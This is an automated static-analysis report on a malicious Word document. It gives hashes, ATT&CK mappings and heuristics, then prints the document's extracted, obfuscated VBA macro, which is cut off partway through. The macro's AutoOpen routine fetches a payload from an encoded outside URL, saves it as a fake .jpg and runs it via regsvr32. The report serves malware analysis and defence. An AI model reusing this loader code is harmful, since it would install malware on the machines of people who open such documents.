Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 ccf950c9869d1bf9…

Verdict: MALICIOUS

File type: Office (OOXML)

Size: 134.2 KB
Created: 2020-07-09 00:03:00 UTC
Authoring application: Microsoft Office Word 16.0000
First seen: 2020-09-07

MD5: d830dff1af4844d03914d53c388902a6
SHA-1: d67e8ab969d141a527238cd6a369f90b0136d92d
SHA-256: ccf950c9869d1bf9882478bb2a8bbf9b65c21eb0e0c8d851c4bdda3232b40c11

Risk score: 142

Malware Insights

MITRE ATT&CK
  • T1059.005 Command and Scripting Interpreter: Visual Basic
  • T1204.002 User Execution: Malicious File

The sample is an OOXML document containing a VBA project with an AutoOpen macro. This macro is configured to execute a shell command, indicating an attempt to download and run a secondary payload. The presence of an external relationship pointing to a local file path suggests a potential obfuscation or staging technique.

Heuristics (5)

  • External relationship (severity: high, OOXML_EXTERNAL_REL)
    External target in word/_rels/document.xml.rels: file:///C:\Framework\rels\builds\pack1\it.jpg
  • VBA project inside OOXML (severity: medium, OOXML_VBA, 2 related findings)
    Document contains a VBA project (VBA macros present)
  • AutoOpen macro (severity: high, OLE_VBA_AUTOOPEN)
    AutoOpen macro present
  • VBA p-code auto-exec with execution tokens (severity: high, OLE_VBA_PCODE_AUTOEXEC_EXEC)
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Embedded URL (severity: info, EMBEDDED_URL)
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    • http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas (OOXML external relationship)
    • http://schemas.microsoft.com/office/drawing/2014/chartex (OOXML external relationship)
    • http://schemas.microsoft.com/office/drawing/2015/9/8/chartex (OOXML external relationship)
    • http://schemas.microsoft.com/office/drawing/2015/10/21/chartex (OOXML external relationship)
    • http://schemas.microsoft.com/office/drawing/2016/5/9/chartex (OOXML external relationship)
    • http://schemas.microsoft.com/office/drawing/2016/5/10/chartex (OOXML external relationship)
    • http://schemas.microsoft.com/office/drawing/2016/5/11/chartex (OOXML external relationship)
    • http://schemas.microsoft.com/office/drawing/2016/5/12/chartex (OOXML external relationship)
    • http://schemas.microsoft.com/office/drawing/2016/5/13/chartex (OOXML external relationship)
    • http://schemas.microsoft.com/office/drawing/2016/5/14/chartex (OOXML external relationship)
    • http://schemas.openxmlformats.org/markup-compatibility/2006 (OOXML external relationship)
    • http://schemas.microsoft.com/office/drawing/2016/ink (OOXML external relationship)
    • http://schemas.microsoft.com/office/drawing/2017/model3d (OOXML external relationship)
    • http://schemas.openxmlformats.org/officeDocument/2006/relationships (OOXML external relationship)
    • http://schemas.openxmlformats.org/officeDocument/2006/math (OOXML external relationship)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing (OOXML external relationship)
    • http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing (OOXML external relationship)
    • http://schemas.openxmlformats.org/wordprocessingml/2006/main (OOXML external relationship)
    • http://schemas.microsoft.com/office/word/2010/wordml (OOXML external relationship)
    • http://schemas.microsoft.com/office/word/2012/wordml (OOXML external relationship)
    • http://schemas.microsoft.com/office/word/2018/wordml/cex (OOXML external relationship)
    • http://schemas.microsoft.com/office/word/2016/wordml/cid (OOXML external relationship)
    • http://schemas.microsoft.com/office/word/2018/wordml (OOXML external relationship)
    • http://schemas.microsoft.com/office/word/2015/wordml/symex (OOXML external relationship)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingGroup (OOXML external relationship)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingInk (OOXML external relationship)
    • http://schemas.microsoft.com/office/word/2006/wordml (OOXML external relationship)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingShape (OOXML external relationship)

Extracted artifacts (2)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source from OOXML)
Size: 4534 bytes
SHA-256: e5bca83cb392162a053e894890c6e430a4e7d1c9f2ef56aa7cd6bb79a9204c71

Preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "ec326802"
Function fe4ec286()
fe4ec286 = ActiveWindow.Index
End Function
Function bbae29b5()
bbae29b5 = ActiveWindow.WindowState
End Function
Function bbea0591()
bbea0591 = ActiveWindow.WindowState
End Function
Function f0a0a2c3()
f0a0a2c3 = Application.ActiveDocument.AutoFormatOverride
End Function
Sub e3d98885(ec5854be, a2edb26c)
Dim e83efae5
e83efae5 = FreeFile
Open ec5854be For Output As #e83efae5
Print #e83efae5, fb9845ed(a2edb26c)
Close #e83efae5
End Sub
Function e5a58b37()
e5a58b37 = ActiveWindow.Width
End Function
Function d714ca6d()
d714ca6d = Application.ActiveDocument.ClickAndTypeParagraphStyle
End Function
Function ce1d86c7()
ce1d86c7 = ActiveWindow.StyleAreaWidth
End Function
Function b3f949cd()
b3f949cd = Application.ActiveDocument.ConsecutiveHyphensLimit
End Function
Function ae96cd43(d3317a6f)
a62717da = Len(d3317a6f)
For ac76f592 = 1 To a62717da Step 2
a70d1643 = a70d1643 & Mid(d3317a6f, ac76f592, 1)
Next
ae96cd43 = a70d1643
End Function
Function e4a520db()
e4a520db = 0
End Function
Function a3db36e8()
a3db36e8 = 140
End Function
Function de283e13()
de283e13 = ActiveWindow.DisplayHorizontalScrollBar
End Function
Function c7bf951d()
c7bf951d = 303 + 27
End Function
Sub b0d4efac()
End Sub
Function cb2a1449()
cb2a1449 = ActiveWindow.IMEMode
End Function
Function bd8139b8()
bd8139b8 = ActiveWindow.StyleAreaWidth
End Function
Function e7973407()
e7973407 = 187
End Function
Function f412b4e9()
f412b4e9 = Application.ActiveDocument.Application
End Function
Sub AutoOpen()
Dim dabbfa2a As New c866f7af
e3d98885 ae96cd43("cf:b\0p8r0ocg0rfa2m2d3a4t8ae\42f65758b5b.0j9p6ga"), dabbfa2a.aec585bb(ae96cd43("h0tdtcpd:b/6/2r30frbfdk1.fceoamb/0i9zf5a/fy0a6c1a5.2p5hdp2?8l4=0kbpct481.0c4a8b3"))
Dim a472d4bc As New WshShell
a472d4bc.exec f1af2dc9 & " " & ae96cd43("cf:b\0p8r0ocg0rfa2m2d3a4t8ae\42f65758b5b.0j9p6ga")
End Sub

Attribute VB_Name = "fdb59699"
Function b25192ce()
b25192ce = ActiveWindow.WindowNumber
End Function
Function bc70d712()
bc70d712 = 52214.477127003
End Function
Function cdf5a88d()
cdf5a88d = Application.ActiveDocument.Content
End Function
Function a24b17e8()
a24b17e8 = Application.ActiveDocument.ActiveThemeDisplayName
End Function
Function fb9845ed(ab45e830)
fb9845ed = StrConv(ab45e830, 64)
End Function
Function cb0a04d6()
cb0a04d6 = ActiveWindow.Parent
End Function
Function f37f7f40()
f37f7f40 = Application.ActiveDocument.ChartDataPointTrack
End Function
Function ca87ecc5()
ca87ecc5 = ActiveWindow.DisplayLeftScrollBar
End Function
Function c9154a47()
c9154a47 = -1286666770
End Function
Function ee199523()
End Function
Function e4f544d0()
e4f544d0 = ActiveWindow.WindowState
End Function
Function f0e683a9()
f0e683a9 = "Foreshortening obeys bounteous"
End Function
Function a1ae8a7d()
a1ae8a7d = ActiveWindow.Top
End Function
Function b2c39231()
b2c39231 = ActiveWindow.HorizontalPercentScrolled
End Function
Function f1af2dc9()
f1af2dc9 = ae96cd43("rae8g3sbv1r33029")
End Function

Attribute VB_Name = "c866f7af"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Function f14bfb6f()
f14bfb6f = ActiveWindow.HorizontalPercentScrolled
End Function
Function dd7d946c()
dd7d946c = ActiveWindow.DocumentMap
End Function
Function e87a7155()
e87a7155 = ActiveWindow.UsableHeight
End Function
Function adfb537d()
adfb537d = Application.ActiveDocument.ClickAndTypeParagraphStyle
End Function
Function aec585bb(cf8f8776)
Dim dace57d9 As Object
Set dace57d9 = New MSXML2.XMLHTTP30
Call d
... (truncated)
Filename: vbaProject_00.bin
Kind: vba-project
Source: OOXML VBA project: word/vbaProject.bin
Size: 28160 bytes
SHA-256: 71e960e5a24eb05a0aba76f9d7b04392c772a2bd94213cc093318c769be8f180